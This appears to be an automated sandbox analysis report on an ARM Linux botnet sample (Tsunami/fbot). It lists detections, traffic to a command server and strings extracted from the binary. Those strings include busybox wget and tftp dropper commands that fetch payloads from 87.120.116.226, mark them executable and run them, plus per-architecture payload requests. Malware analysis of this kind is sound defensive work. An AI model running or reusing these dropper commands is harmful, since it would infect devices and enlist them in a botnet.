| Source | Finding |
|---|---|
| arm.elf | ReversingLabs: Detection: 42% |
| global traffic | TCP traffic: 192.168.2.13:46006 -> 85.239.34.134:7685 |
| unknown | TCP traffic detected without corresponding DNS query: 85.239.34.134 |
| unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
| arm.elf | String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube) |
| arm.elf | String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube) |
| global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com |
| arm.elf | String found in binary or memory: http://87.120.116.226 |
| arm.elf | String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY |
| arm.elf | String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ |
| Initial sample | String containing 'busybox' found: /bin/busybox TSUNAMI |
| Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/busybox |
| Initial sample | String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
| Initial sample | String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo |
| Initial sample | String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x2bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox |
| Initial sample | String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
| Initial sample | String containing 'busybox' found: /bin/busybox wget http:// |
| Initial sample | String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t |
| Initial sample | String containing 'busybox' found: /bin/busybox tftp -r |
| Initial sample | String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t |
| Initial sample | String containing 'busybox' found: /bin/busybox echo -en ' |
| Initial sample | String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
| Initial sample | String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t |
| Initial sample | Potential command found: GET /fbot.arm5 HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.arm7 HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.x86 HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.mips HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.mipsel HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.powerpc HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.sparc HTTP/1.0 |
| Initial sample | Potential command found: GET /fbot.sh4 HTTP/1.0 |
| ELF static info symbol of initial sample | .symtab present: no |
| classification engine | Classification label: mal48.linELF@0/0@2/0 |
| /usr/bin/dash (PID: 5416) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp |
| /usr/bin/dash (PID: 5417) | Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp |
| /tmp/arm.elf (PID: 5428) | Queries kernel information via 'uname' |
| arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp | Binary or memory string: R \|U!/etc/qemu-binfmt/arm |
| arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp | Binary or memory string: :Cx86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf |
| arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm |
| arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm |